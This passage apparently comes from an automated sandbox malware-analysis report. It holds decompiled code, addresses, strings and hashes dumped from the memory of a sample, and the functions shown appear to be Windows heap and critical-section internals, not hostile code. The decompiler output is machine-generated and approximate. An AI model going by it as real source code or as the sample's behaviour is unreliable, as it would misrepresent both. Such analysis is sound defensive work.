						_v120 =  *(_t499 + 0x74) << 3;
						_v128 =  *((intOrPtr*)(_t499 + 0x208));
						_v108 =  *((intOrPtr*)(_t499 + 0x200));
						_v132 =  *((intOrPtr*)(_t499 + 0x1fc));
						_v136 =  *((intOrPtr*)(_t499 + 0x204));
						_t422 =  *((intOrPtr*)(_t499 + 0x20c));
						_v104 = _t422;
						_v100 = _t422;
						_t423 =  *(_t499 + 0xb4);
						__eflags = _t423;
						if(_t423 != 0) {
							_t480 =  *((intOrPtr*)(_t423 + 0xc));
							_v116 = _t480;
							_t429 =  *_t423;
							__eflags = _t429;
							if(_t429 != 0) {
								_t431 =  *((intOrPtr*)(_t429 + 0xc)) + _t480;
								__eflags = _t431;
								_v116 = _t431;
							}
						}
						_t424 =  *(_t499 + 0xc8);
						_t478 =  *((intOrPtr*)(_t499 + 0x218));
						_v112 = _t478;
						__eflags = _t424;
						if(_t424 != 0) {
							_t427 =  *_t424;
							__eflags = _t427 - 0xffffffff;
							if(_t427 != 0xffffffff) {
								_t434 =  *(_t427 + 0x14);
							}
							_v112 = _t478 + _t434;
						}
					} else {
						_t482 =  &_v172;
						E342392AB(_v212,  &_v172);
					}
					 *0x342691e0( &_v172, _v232);
					_t310 =  *_t484();
					goto L98;
				}
			}

0x34219068
0x34219075
0x3421907c
0x34219081
0x34219084
0x34219086
0x34219093
0x34219096
0x3421909a
0x3421909e
0x342190a2
0x342190a9
0x342190f8
0x342190ff
0x34219103
0x34219107
0x00000000
0x34219109
0x34219109
0x00000000
0x34219109
0x342190ab
0x342190ab
0x342190b0
0x342190b4
0x342190ba
0x3421921d
0x34219222
0x34219225
0x3421922d
0x34219235
0x34219239
0x3421923d
0x3421925c
0x34219260
0x3421926d
0x34219277
0x34219284
0x3421928e
0x3421928e
0x3421928e
0x34219292
0x3421923f
0x34219246
0x3421924a
0x34219255
0x34219255
0x34219294
0x34219296
0x34219893
0x3421989a
0x3421989b
0x3421989c
0x342198a7
0x3421929c
0x342192a7
0x342192ad
0x342192af
0x342192b1
0x00000000
0x00000000
0x342192b7
0x342192bb
0x342192be
0x00000000
0x00000000
0x342192c6
0x342192cc
0x342192cf
0x342192d3
0x342192d8
0x342192d8
0x342192da
0x342192dd
0x342192dd
0x342192df
0x342192e3
0x342192e4
0x342192ea
0x342192ef
0x342192f4
0x00000000
0x00000000
0x342192fa
0x342192fc
0x00000000
0x00000000
0x34219302
0x34219306
0x34219309
0x3421947c
0x34219482
0x3421961c
0x34219622
0x34219674
0x34219679
0x34219728
0x34219728
0x3421972d
0x34219731
0x00000000
0x00000000
0x34219737
0x34219737
0x3421973a
0x34219805
0x3421980e
0x34219811
0x34219819
0x3421981d
0x34219821
0x34219829
0x34219831
0x34219834
0x34219836
0x34219836
0x3421983b
0x3421983f
0x34219842
0x3421984d
0x34219844
0x34219846
0x34219847
0x34219847
0x34219851
0x34219857
0x3421985e
0x34219864
0x00000000
0x00000000
0x34219866
0x34219866
0x00000000
0x34219859
0x34219859
0x34219869
0x34219869
0x3421986d
0x3421986d
0x34219871
0x3421987c
0x34219882
0x34219884
0x34219886
0x00000000
0x00000000
0x34219888
0x34219888
0x00000000
0x34219888
0x34219857
0x34219744
0x34219748
0x34219755
0x3421975c
0x3421975d
0x34219764
0x3421976b
0x34219776
0x34219781
0x34219788
0x3421978a
0x3421978c
0x3421978c
0x34219791
0x34219798
0x3421979e
0x342197a2
0x342197a3
0x342197a3
0x342197aa
0x342197ad
0x342197af
0x342197af
0x342197b2
0x342197b2
0x342197bd
0x342197c9
0x342197d6
0x342197de
0x342197e5
0x342197f0
0x00000000
0x342197f0
0x3421967f
0x34219683
0x34219687
0x34219693
0x34219697
0x342196b3
0x342196b8
0x342196bd
0x00000000
0x00000000
0x342196cb
0x342196d0
0x342196d4
0x342196e1
0x342196ed
0x342196f5
0x342196fc
0x34219704
0x3421970c
0x34219714
0x3421971a
0x3421971c
0x3421971e
0x00000000
0x00000000
0x34219724
0x00000000
0x34219724
0x34219689
0x3421968d
0x00000000
0x00000000
0x00000000
0x3421968d
0x34219624
0x34219629
0x3421962d
0x00000000
0x00000000
0x3421963b
0x34219644
0x34219647
0x3421964b
0x3421964f
0x34219657
0x3421965f
0x34219667
0x00000000
0x34219667
0x34219492
0x34219497
0x3421949a
0x342194a2
0x342194a4
0x342194ac
0x342194b3
0x342194b7
0x342194f4
0x342194f8
0x342194fb
0x342194ff
0x34219503
0x34219505
0x34219507
0x34219509
0x3421950f
0x3421950b
0x3421950b
0x3421950b
0x34219509
0x34219515
0x3421953d
0x3421953d
0x3421953f
0x00000000
0x00000000
0x34219522
0x34219524
0x3421952d
0x3421952f
0x3421952f
0x34219531
0x3421953b
0x3421953b
0x00000000
0x3421953b
0x34219533
0x34219535
0x00000000
0x00000000
0x34219537
0x00000000
0x34219537
0x34219526
0x00000000
0x00000000
0x34219528
0x00000000
0x34219528
0x34219550
0x34219557
0x34219557
0x34219559
0x34219561
0x3421956a
0x34219570
0x34219574
0x34219576
0x00000000
0x00000000
0x34219584
0x34219589
0x3421958c
0x34219596
0x34219597
0x3421959b
0x3421959f
0x342195c1
0x342195cd
0x342195d8
0x342195d8
0x342195a1
0x342195a1
0x342195a8
0x342195af
0x342195b6
0x342195b6
0x342195e7
0x342195ef
0x342195f8
0x34219601
0x34219607
0x34219609
0x3421960b
0x00000000
0x34219611
0x34219611
0x34219615
0x00000000
0x34219615
0x3421960b
0x342194bd
0x342194c0
0x342194c4
0x342194cd
0x342194cd
0x342194cd
0x342194cf
0x342194d4
0x342194e0
0x342194e7
0x342194eb
0x00000000
0x342194eb
0x3421930f
0x34219314
0x3421933c
0x3421933c
0x34219340
0x3421934a
0x3421934f
0x34219353
0x3421935c
0x34219368
0x34219370
0x34219377
0x3421937f
0x34219387
0x3421938d
0x3421938f
0x34219391
0x00000000
0x00000000
0x34219397
0x3421939b
0x342193ef
0x342193f5
0x34219400
0x34219400
0x34219406
0x34219408
0x3421940c
0x34219411
0x34219411
0x34219414
0x34219418
0x34219420
0x34219425
0x34219429
0x34219436
0x34219442
0x34219449
0x34219451
0x34219459
0x34219461
0x34219465
0x3421946b
0x3421946d
0x3421946f
0x00000000
0x00000000
0x34219475
0x00000000
0x34219475
0x3421939d
0x342193a5
0x342193d6
0x342193df
0x342193e3
0x00000000
0x342193e3
0x342193a7
0x342193c7
0x342193cc
0x00000000
0x342193cc
0x34219316
0x3421931c
0x00000000
0x00000000
0x3421931e
0x34219322
0x3421932c
0x34219332
0x34219338
0x34219334
0x34219334
0x34219334
0x00000000
0x34219332
0x34219891
0x34219891
0x00000000
0x34219891
0x34219296
0x342190c8
0x342190cd
0x342190d0
0x342190d8
0x342190e4
0x34219119
0x34219123
0x3421912b
0x34219136
0x34219140
0x34219150
0x34219159
0x34219166
0x34219173
0x3421917d
0x3421918a
0x34219194
0x34219198
0x3421919e
0x342191a5
0x342191ac
0x342191b2
0x342191b4
0x342191b6
0x342191b9
0x342191c0
0x342191c2
0x342191c4
0x342191c9
0x342191c9
0x342191cb
0x342191cb
0x342191c4
0x342191d2
0x342191d8
0x342191de
0x342191e5
0x342191e7
0x342191e9
0x342191eb
0x342191ee
0x342191f0
0x342191f0
0x342191f6
0x342191f6
0x342190e6
0x342190ea
0x342190ee
0x342190ee
0x34219208
0x3421920e
0x00000000
0x3421920e

APIs

RtlDebugPrintTimes.NTDLL ref: 34219208
RtlDebugPrintTimes.NTDLL ref: 342192A7
RtlDebugPrintTimes.NTDLL ref: 34219387
RtlDebugPrintTimes.NTDLL ref: 34219465
RtlDebugPrintTimes.NTDLL ref: 3421956A
RtlDebugPrintTimes.NTDLL ref: 34219601
RtlDebugPrintTimes.NTDLL ref: 34219714
RtlDebugPrintTimes.NTDLL ref: 3421987C

Strings

, xrefs: 34219657
0, xrefs: 34219776
, xrefs: 34219704

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $ $0
API String ID: 3446177414-3352262554
Opcode ID: 070064047b5f7bd78e5bdf7678da56693c025832241b133533fa58766acfe610
Instruction ID: 4cd6cc3e6017451bbb8b99ac01fc3cb1c5e4b11479e7efc782598106c0ac07e7
Opcode Fuzzy Hash: 070064047b5f7bd78e5bdf7678da56693c025832241b133533fa58766acfe610
Instruction Fuzzy Hash: B73224B16083818FE350CF69C884B5BBBE5BF88344F04492EF59AA7250D7B5E949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 341A8540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Invalid debug info address of this critical section, xrefs: 341E52C1
Thread is in a state in which it cannot own a critical section, xrefs: 341E534E
Critical section address., xrefs: 341E530D
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 341E52D9
Thread identifier, xrefs: 341E5345
Critical section debug info address, xrefs: 341E522A, 341E5339
Critical section address, xrefs: 341E5230, 341E52C7, 341E533F
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 341E52ED
double initialized or corrupted critical section, xrefs: 341E5313
Address of the debug info found in the active list., xrefs: 341E52B9, 341E5305
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 341E5215, 341E52A1, 341E5324
corrupted critical section, xrefs: 341E52CD
8, xrefs: 341E50EE
undeleted critical section in freed memory, xrefs: 341E5236

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 83a0c253c113ce04e3b73ff2d7823af53bc6645f745a98b8e0596c5ae0ec4d49
Instruction ID: 888243136c2c64ad50be321398a91431e417533c25adc18dbf1e78a1b1a63ff0
Opcode Fuzzy Hash: 83a0c253c113ce04e3b73ff2d7823af53bc6645f745a98b8e0596c5ae0ec4d49
Instruction Fuzzy Hash: 37818C78A01B08EFEB50CF94C984BAEFBB9EB08714F104199F915B7290D7B5A945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 3421FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E3421FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x3424d430);
				L341C7BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E34167662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E342202E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							L3416B910();
						} else {
							L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						L3416B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E3417FED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E34220835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E3416753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x342647c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x342647cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x342647ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								L3416B910();
							} else {
								L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E3421823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							L3416B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x342647a1 = 1;
								 *0x34264100 = 0;
								asm("int3");
								 *0x342647a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							L3416B910();
						} else {
							L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						L3416B910("Just reallocated block at %p to %Ix bytes\n",  *0x342647c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x342647c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E34182710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E3422D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = L341A3AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E3419FDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E34220D24(_t281);
								__eflags = 0;
								E34220835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x342647cc;
							if( *0x342647cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E3422D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = L341A3AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x342647cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x342647ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									L3416B910();
								} else {
									L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E3421823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								L3416B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x342647a1 = 1;
									 *0x34264100 = 0;
									asm("int3");
									 *0x342647a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							L3416B910();
						} else {
							L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						L3416B910("About to reallocate block at %p to %Ix bytes\n",  *0x342647c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x3426374c; // 0x0
					 *0x342691e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}

0x3421fdf4
0x3421fdf6
0x3421fdfb
0x3421fe02
0x3421fe04
0x3421fe09
0x3421fe0c
0x3421fe16
0x3421fe35
0x3421fe38
0x3421fe46
0x3421fe4b
0x3421fe4d
0x34220277
0x34220277
0x3422027a
0x3422027a
0x342202c2
0x342202c9
0x342202ce
0x00000000
0x342202ce
0x3421fe56
0x3421fe58
0x3421fe62
0x3421fe65
0x3421fe69
0x3421fe72
0x3421fe72
0x3421fe6b
0x3421fe6b
0x3421fe6b
0x3421fe81
0x3421fe84
0x3421fe87
0x3421fe8a
0x34220231
0x34220231
0x34220237
0x3422023a
0x34220259
0x3422025e
0x3422023c
0x34220251
0x34220256
0x34220264
0x3422026f
0x00000000
0x34220274
0x3421fe90
0x3421fe93
0x00000000
0x00000000
0x3421fe9b
0x3421fe9f
0x3421fea2
0x3421feaa
0x3421feaf
0x3421feb6
0x3421feb6
0x3421febb
0x3421febb
0x3421fec2
0x3421fec7
0x3421feca
0x3421fecd
0x3421fed1
0x3421feda
0x3421feda
0x3421feda
0x3421fedc
0x3421fedf
0x3421fee7
0x3421fee9
0x3421feee
0x3421fef0
0x34220122
0x34220122
0x34220125
0x34220127
0x00000000
0x00000000
0x3422012d
0x34220133
0x34220139
0x342201a7
0x342201aa
0x342201ad
0x342201b2
0x00000000
0x00000000
0x342201bc
0x342201c3
0x00000000
0x00000000
0x342201cd
0x342201d4
0x00000000
0x00000000
0x342201da
0x342201e0
0x342201e3
0x34220202
0x34220207
0x342201e5
0x342201fa
0x342201ff
0x34220218
0x34220219
0x34220224
0x3422017e
0x3422017e
0x34220184
0x34220188
0x3422018e
0x34220195
0x3422019b
0x3422019c
0x3422019c
0x00000000
0x34220188
0x3422013b
0x3422013e
0x3422015d
0x34220162
0x34220140
0x34220155
0x3422015a
0x34220168
0x34220176
0x00000000
0x3421fef6
0x3421fef6
0x3421fefc
0x3421ff02
0x3421ff70
0x3421ff73
0x3421ff76
0x3421ff7b
0x34220068
0x34220070
0x34220075
0x34220078
0x3422007a
0x34220080
0x34220080
0x34220083
0x34220087
0x34220090
0x34220090
0x34220090
0x34220092
0x34220094
0x34220097
0x3422009a
0x3422009f
0x342200a9
0x342200ac
0x342200ae
0x342200af
0x342200b3
0x342200b3
0x342200ac
0x342200b8
0x342200bc
0x342200ec
0x342200ef
0x342200f2
0x342200be
0x342200c0
0x342200c5
0x342200ca
0x342200d1
0x342200e3
0x342200d3
0x342200d4
0x342200d9
0x342200dc
0x342200df
0x342200df
0x342200e6
0x342200e6
0x342200f5
0x342200f9
0x342200fc
0x34220108
0x3422010e
0x3422010e
0x3422010e
0x342200fc
0x34220114
0x34220119
0x3422011d
0x00000000
0x3422011d
0x3421ff81
0x3421ff88
0x00000000
0x00000000
0x3421ff8e
0x3421ff91
0x3421ff94
0x3421ff97
0x3421ff9c
0x3421ffa6
0x3421ffa9
0x3421ffab
0x3421ffb0
0x3421ffb5
0x3421ffb5
0x3421ffa9
0x3421ffb8
0x3421ffbc
0x3421ffce
0x3421ffd1
0x3421ffd4
0x3421ffbe
0x3421ffc0
0x3421ffc5
0x3421ffc8
0x3421ffc8
0x3421ffd7
0x3421ffd9
0x3421ffdd
0x3421ffe0
0x3421ffea
0x3421fff0
0x3421fff0
0x3421fff0
0x3421fff2
0x3421fff5
0x34220065
0x34220065
0x3421fff7
0x3421fff7
0x3421fffe
0x00000000
0x00000000
0x34220004
0x3422000b
0x00000000
0x00000000
0x3422000d
0x34220013
0x34220016
0x34220035
0x3422003a
0x34220018
0x3422002d
0x34220032
0x34220040
0x3422004b
0x3422004c
0x3422004f
0x34220058
0x3422005d
0x3421ff47
0x3421ff47
0x3421ff4d
0x3421ff51
0x3421ff57
0x3421ff5e
0x3421ff64
0x3421ff65
0x3421ff65
0x3421ff51
0x00000000
0x3421fff5
0x3421ff04
0x3421ff07
0x3421ff26
0x3421ff2b
0x3421ff09
0x3421ff1e
0x3421ff23
0x3421ff31
0x3421ff3f
0x3421ff44
0x00000000
0x3421ff44
0x3421fe18
0x3421fe20
0x3421fe28
0x3421fe2e
0x342202d1
0x342202d4
0x342202e0
0x342202e0

APIs

RtlDebugPrintTimes.NTDLL ref: 3421FE28

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 34220171
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 3422021F
HEAP[%wZ]: , xrefs: 3421FF19, 34220028, 34220150, 342201F5, 3422024C
HEAP: , xrefs: 3421FF26, 34220035, 3422015D, 34220202, 34220259
About to reallocate block at %p to %Ix bytes, xrefs: 3421FF3A
RtlReAllocateHeap, xrefs: 3421FE3F, 3421FEE2
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3422026A
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 34220053

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: c6e6aa8662f1a019d53fd0052874c8a169d0c0b912d5d54839fcd43e011daff2
Instruction ID: 06799e5b02a6fb465f3627b1b12898dd5767eca8733e16201673216a26fd3aca
Opcode Fuzzy Hash: c6e6aa8662f1a019d53fd0052874c8a169d0c0b912d5d54839fcd43e011daff2
Instruction Fuzzy Hash: 81D1E375500A56DFEB42CFA8C480AAEBBF2FF09314F04809AE945BB652CB79D951CF14

Uniqueness

Uniqueness Score: -1.00%

Function 342186C2 Relevance: 12.6, Strings: 10, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E342186C2(void* __ebx, signed short* __ecx, signed short __edx) {
				signed int _v8;
				char _v268;
				char _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char _v1076;
				signed int _v1084;
				signed int _v1092;
				signed short _v1096;
				void* __edi;
				void* __esi;
				signed int _t54;
				short* _t59;
				void* _t65;
				signed int _t66;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t75;
				void* _t80;
				void* _t81;
				signed short _t82;
				signed short* _t84;
				void* _t85;
				intOrPtr* _t86;
				signed int _t90;
				void* _t92;
				signed int _t93;
				signed int _t95;

				_t82 = __edx;
				_t75 = __ebx;
				_t95 = (_t93 & 0xfffffff8) - 0x448;
				_v8 =  *0x3426b370 ^ _t95;
				_t84 = __ecx;
				_v324 = L"svchost.exe";
				_v320 = L"runtimebroker.exe";
				_t90 = 0;
				_v316 = L"csrss.exe";
				_v312 = L"smss.exe";
				_v308 = L"services.exe";
				_v304 = L"lsass.exe";
				_v1084 =  *[fs:0x30];
				if((E34170670() & 0x00010000) != 0) {
					L26:
					 *0x342638c0 = _t90;
					_t90 = 1;
				} else {
					if(E341742B0(0, 0, L"http://schemas.microsoft.com/SMI/2020/WindowsSettings", L"heapType",  &_v300, 0xf, 0) < 0) {
						L3:
						_t54 = _v1084;
						if(( *(_t54 + 3) & 0x00000010) == 0) {
